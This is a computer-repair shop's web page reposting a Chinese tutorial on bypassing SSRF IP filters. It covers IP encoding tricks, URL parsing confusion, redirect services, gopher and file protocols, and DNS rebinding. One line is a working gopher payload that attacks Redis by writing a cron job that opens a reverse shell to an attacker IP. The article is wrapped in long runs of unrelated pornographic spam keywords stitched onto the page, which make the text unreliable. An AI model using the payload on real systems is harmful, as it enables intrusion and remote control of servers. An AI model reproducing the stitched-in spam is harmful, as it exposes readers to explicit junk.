国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
SSRF漏洞中繞過(guò)IP限制的幾種方法總結(jié)

作者: 佚名  日期:2017-05-29 06:29:29   來(lái)源: 本站整理

 一、SSRF簡(jiǎn)介
SSRF(Server-Side Request Forgery,服務(wù)器端請(qǐng)求偽造):通俗的來(lái)說(shuō)就是我們可以偽造服務(wù)器端發(fā)起的請(qǐng)求,從而獲取客戶端所不能得到的數(shù)據(jù)。SSRF漏洞形成的原因主要是服務(wù)器端所提供的接口中包含了所要請(qǐng)求的內(nèi)容的URL參數(shù),并且未對(duì)客戶端所傳輸過(guò)來(lái)的URL參數(shù)進(jìn)行過(guò)濾。這個(gè)漏洞造成的危害有:
(1)、可以對(duì)外網(wǎng)、服務(wù)器所在內(nèi)網(wǎng)、本地進(jìn)行端口掃描,獲取一些服務(wù)的banner信息;
(2)、攻擊運(yùn)行在內(nèi)網(wǎng)或本地的應(yīng)用程序(比如溢出);
(3)、對(duì)內(nèi)網(wǎng)Web應(yīng)用進(jìn)行指紋識(shí)別,通過(guò)訪問(wèn)默認(rèn)文件實(shí)現(xiàn);
(4)、攻擊內(nèi)外網(wǎng)的Web應(yīng)用,主要是使用Get參數(shù)就可以實(shí)現(xiàn)的攻擊(比如Struts2漏洞利用,SQL注入等);
(5)、利用File協(xié)議讀取本地文件。
一般的防御措施是對(duì)URL參數(shù)進(jìn)行過(guò)濾,或者使得URL參數(shù)用戶不可控。
二、繞過(guò)SSRF過(guò)濾的幾種方法
下文出現(xiàn)的192.168.0.1,10.0.0.1全部為服務(wù)器端的內(nèi)網(wǎng)地址。
1、更改IP地址寫法
一些開發(fā)者會(huì)通過(guò)對(duì)傳過(guò)來(lái)的URL參數(shù)進(jìn)行正則匹配的方式來(lái)過(guò)濾掉內(nèi)網(wǎng)IP,如采用如下正則表達(dá)式:
^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$
^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
對(duì)于這種過(guò)濾我們可以采用改編IP的寫法的方式進(jìn)行繞過(guò),例如192.168.0.1這個(gè)IP地址我們可以改寫成:
(1)、8進(jìn)制格式:0300.0250.0.1
(2)、16進(jìn)制格式:0xC0.0xA8.0.1
(3)、10進(jìn)制整數(shù)格式:3232235521
(4)、16進(jìn)制整數(shù)格式:0xC0A80001
還有一種特殊的省略模式,例如10.0.0.1這個(gè)IP可以寫成10.1
2、利用解析URL所出現(xiàn)的問(wèn)題
在某些情況下,后端程序可能會(huì)對(duì)訪問(wèn)的URL進(jìn)行解析,對(duì)解析出來(lái)的host地址進(jìn)行過(guò)濾。這時(shí)候可能會(huì)出現(xiàn)對(duì)URL參數(shù)解析不當(dāng),導(dǎo)致可以繞過(guò)過(guò)濾。
http://www.baidu.com@192.168.0.1/
當(dāng)后端程序通過(guò)不正確的正則表達(dá)式(比如將http之后到com為止的字符內(nèi)容,也就是www.baidu.com,認(rèn)為是訪問(wèn)請(qǐng)求的host地址時(shí))對(duì)上述URL的內(nèi)容進(jìn)行解析的時(shí)候,很有可能會(huì)認(rèn)為訪問(wèn)URL的host為www.baidu.com,而實(shí)際上這個(gè)URL所請(qǐng)求的內(nèi)容都是192.168.0.1上的內(nèi)容。
3、利用302跳轉(zhuǎn)
如果后端服務(wù)器在接收到參數(shù)后,正確的解析了URL的host,并且進(jìn)行了過(guò)濾,我們這個(gè)時(shí)候可以使用302跳轉(zhuǎn)的方式來(lái)進(jìn)行繞過(guò)。
(1)、在網(wǎng)絡(luò)上存在一個(gè)很神奇的服務(wù),http://xip.io 當(dāng)我們?cè)L問(wèn)這個(gè)網(wǎng)站的子域名的時(shí)候,例如192.168.0.1.xip.io,就會(huì)自動(dòng)重定向到192.168.0.1。
(2)、由于上述方法中包含了192.168.0.1這種內(nèi)網(wǎng)IP地址,可能會(huì)被正則表達(dá)式過(guò)濾掉,我們可以通過(guò)短地址的方式來(lái)繞過(guò)。經(jīng)過(guò)測(cè)試發(fā)現(xiàn)新浪,百度的短地址服務(wù)并不支持IP模式,所以這里使用的是http://tinyurl.com所提供的短地址服務(wù),如下圖所示:

同樣的,我們也可以自行寫一個(gè)跳轉(zhuǎn)的服務(wù)接口來(lái)實(shí)現(xiàn)類似的功能。
4、通過(guò)各種非HTTP協(xié)議:
如果服務(wù)器端程序?qū)υL問(wèn)URL所采用的協(xié)議進(jìn)行驗(yàn)證的話,可以通過(guò)非HTTP協(xié)議來(lái)進(jìn)行利用。
(1)、GOPHER協(xié)議:通過(guò)GOPHER我們?cè)谝粋(gè)URL參數(shù)中構(gòu)造Post或者Get請(qǐng)求,從而達(dá)到攻擊內(nèi)網(wǎng)應(yīng)用的目的。例如我們可以使用GOPHER協(xié)議對(duì)與內(nèi)網(wǎng)的Redis服務(wù)進(jìn)行攻擊,可以使用如下的URL:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1

%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d

%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%

0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4

%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
(2)、File協(xié)議:File協(xié)議主要用于訪問(wèn)本地計(jì)算機(jī)中的文件,我們可以通過(guò)類似file:///文件路徑這種格式來(lái)訪問(wèn)計(jì)算機(jī)本地文件。使用file協(xié)議可以避免服務(wù)端程序?qū)τ谒L問(wèn)的IP進(jìn)行的過(guò)濾。例如我們可以通過(guò)file:///d:/1.txt 來(lái)訪問(wèn)D盤中1.txt的內(nèi)容
5、DNS Rebinding
對(duì)于常見的IP限制,后端服務(wù)器可能通過(guò)下圖的流程進(jìn)行IP過(guò)濾:

對(duì)于用戶請(qǐng)求的URL參數(shù),首先服務(wù)器端會(huì)對(duì)其進(jìn)行DNS解析,然后對(duì)于DNS服務(wù)器返回的IP地址進(jìn)行判斷,如果在黑名單中,就pass掉。
但是在整個(gè)過(guò)程中,第一次去請(qǐng)求DNS服務(wù)進(jìn)行域名解析到第二次服務(wù)端去請(qǐng)求URL之間存在一個(gè)時(shí)間查,利用這個(gè)時(shí)間差,我們可以進(jìn)行DNS 重綁定攻擊。
要完成DNS重綁定攻擊,我們需要一個(gè)域名,并且將這個(gè)域名的解析指定到我們自己的DNS Server,在我們的可控的DNS Server上編寫解析服務(wù),設(shè)置TTL時(shí)間為0。這樣就可以進(jìn)行攻擊了,完整的攻擊流程為:
(1)、服務(wù)器端獲得URL參數(shù),進(jìn)行第一次DNS解析,獲得了一個(gè)非內(nèi)網(wǎng)的IP
(2)、對(duì)于獲得的IP進(jìn)行判斷,發(fā)現(xiàn)為非黑名單IP,則通過(guò)驗(yàn)證
(3)、服務(wù)器端對(duì)于URL進(jìn)行訪問(wèn),由于DNS服務(wù)器設(shè)置的TTL為0,所以再次進(jìn)行DNS解析,這一次DNS服務(wù)器返回的是內(nèi)網(wǎng)地址。
(4)、由于已經(jīng)繞過(guò)驗(yàn)證,所以服務(wù)器端返回訪問(wèn)內(nèi)網(wǎng)資源的結(jié)果。
三、總結(jié)
         總的來(lái)說(shuō),造成能夠繞過(guò)服務(wù)器端檢查的原因是在服務(wù)器對(duì)資源進(jìn)行請(qǐng)求的時(shí)候?qū)RL的驗(yàn)證出現(xiàn)了紕漏,除了上述已知的方法外可能還有不同的方法,但是萬(wàn)變不離其宗。同時(shí),在程序員進(jìn)行開發(fā)的同時(shí),盡量使用白名單的方式來(lái)進(jìn)行過(guò)濾,能夠較大程度上的保證安全性。



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    91日韩视频在线观看| 成人香蕉社区| 国语自产精品视频在免费| 国产精品vip| 一区二区三区四区在线免费观看| 在线播放视频一区| 亚洲日本欧美日韩高观看| 中文字幕欧美日韩一区| 欧美一区二区福利视频| 亚洲国产三级网| 91中文字幕在线| 国内伊人久久久久久网站视频| 91入口在线观看| 国产成人综合久久| 久久综合九色综合久99| 激情五月亚洲色图| 深夜福利小视频| 国产精品久久久久久久久久久久久久久久久| 激情五月俺来也| 美女被艹视频网站| 在线播放一级片| 每日更新av在线播放| 成年在线观看免费人视频| 欧美变态视频| 黄色网址在线免费播放| 国产色婷婷在线| 老司机午夜精品| 国产精品久久久久免费a∨大胸| 日本大胆人体视频| 性少妇bbw张开| 国产午夜精品理论片在线| 成年网站在线观看视频| 日韩不卡在线| 99视频一区| 波多野结衣在线aⅴ中文字幕不卡 波多野结衣在线一区 | xxx国产在线观看| 精品国内自产拍在线观看视频| 99在线热播精品免费| 欧美国产97人人爽人人喊| 欧美一区二区色| 暗呦丨小u女国产精品| 国产精选在线观看| av手机在线观看| 中文字幕av高清片| 在线播放色视频| 日本中文字幕在线观看| 99国产精品免费网站| 国产精品高清免费在线观看| 91精品在线视频观看| 国产精品66| 欧美三级午夜理伦三级中文幕| 久久天天躁狠狠躁夜夜躁2014| 真实国产乱子伦对白在线| 91精品国产91久久久| 欧美午夜不卡在线观看免费| 国产在线看一区| 国产精品xxx在线观看| 国产人成在线视频| 一二三四视频免费观看在线看| 老熟妇仑乱一区二区av| 国产高潮失禁喷水爽到抽搐| 久久久久久久有限公司| 亚洲91精品在线| 日韩精品一区二区在线观看| 国产精品国产馆在线真实露脸 | 米奇在线777| 午夜黄色小视频| 欧美日韩免费一区二区| 香蕉免费毛片视频| 国精产品一区一区三区免费视频| 青青草精品视频在线| 国产午夜精品在线| 欧美专区第一页| 国产一区二区三区视频免费| 欧美三级电影一区| 夜夜精品视频一区二区| 成人福利视频网站| 欧美高清在线一区| 黑人巨大精品欧美一区二区三区| 国产亚洲午夜高清国产拍精品| 久久久亚洲一区| 亚洲欧美综合| 香蕉人人精品| 久久av日韩| 手机在线观看av| 亚洲综合伊人久久大杳蕉| 夜色福利资源站www国产在线视频| 很黄很色的网站| 在线免费观看色| 涩涩涩在线视频| 亚州综合一区| 老司机久久99久久精品播放免费| 国产精品久久| 天天综合精品| 欧美一区二区三区激情视频 | 黄色成人免费网| 亚洲天堂电影| 9999精品成人免费毛片在线看| 国产美女精品视频免费播放软件| 欧美与亚洲与日本直播| 成功精品影院| 午夜一级在线看亚洲| 日韩av在线免费观看不卡| 亚洲欧美日韩一区在线观看| 成人在线综合网| 91美女视频网站| 国产亚洲美州欧州综合国| 欧美性生交大片免费| 色婷婷精品久久二区二区蜜臂av| 亚洲综合色区另类av| 亚洲精品成a人在线观看| 日韩女在线观看| 国产精品av网站| 欧美日韩视频免费在线观看| 久久久99精品视频| 久久综合色视频| 久久久久久久久久久久久国产精品| 黄色一级大片免费| 免费看黄色aaaaaa 片| 国产又大又粗又爽的毛片| 国产黄色录像视频| 九九在线观看视频| 国产乡下妇女做爰| 天天天天天天天干| 中国一级特黄视频| 超碰在线观看av| 先锋影音中文字幕| 国产精品入口麻豆免费| 国产黄色在线播放| 欧美久久精品一级c片| 成人精品免费网站| 精品福利在线导航| 久久人人爽人人爽爽久久| 91超碰中文字幕久久精品| 欧美一级黄色录像片| 欧美v在线观看| 日韩大尺度视频| 又色又爽的视频| 无码视频在线观看| 中文在线字幕在线观看| 国产在线传媒| 精品成人自拍视频| 亚洲黄网站黄| 成人国产精品免费观看动漫 | 欧美高清在线视频观看不卡| 亚洲精品成人a8198a| 国产精品男人的天堂| 六月婷婷激情网| 久久久精品人妻一区二区三区四| 久久久国产高清| 国产真实乱人偷精品视频| 8x8x国产| 亚洲无限乱码一二三四麻| 日本在线一区二区三区| 亚洲欧美色图| 久久国产精品99久久久久久老狼 | 亚洲精品国产一区二区精华液 | 亚洲天堂日韩av| **毛片在线网站| 欧美人与动牲性行为| 国产高清日韩| 国产69精品久久久久毛片| 亚洲综合自拍偷拍| 热门国产精品亚洲第一区在线| 手机在线成人免费视频| 美女福利视频网| 国产福利免费视频| 免费在线观看a| 免费高清在线观看| 欧美日韩黄网站| 亚洲国内欧美| 91麻豆精品91久久久久同性| 欧美日韩高清区| 欧美xxxx黑人又粗又长精品| 青青青手机在线视频| 四虎国产精品成人免费4hu| av在线麻豆| 亚洲视频分类| 国产一区二区免费看| 日韩精品视频免费| 91免费在线观看网站| 亚洲黄色免费视频| eeuss影院18www免费| 成全电影大全在线观看| 免费成人在线观看| 欧美日韩美女在线观看| 99理论电影网| 小早川怜子一区二区三区| 国产精品久久久久久久妇| 日本h片在线看| 亚洲国产一区二区精品专区| 精品国产伦一区二区三区观看方式| 欧美与动交zoz0z| 色婷婷av一区二区三区之e本道| siro系绝美精品系列| 性欧美超级视频| 日本不卡123| 欧美性感一区二区三区| 日韩欧美精品一区二区| av网站免费在线看|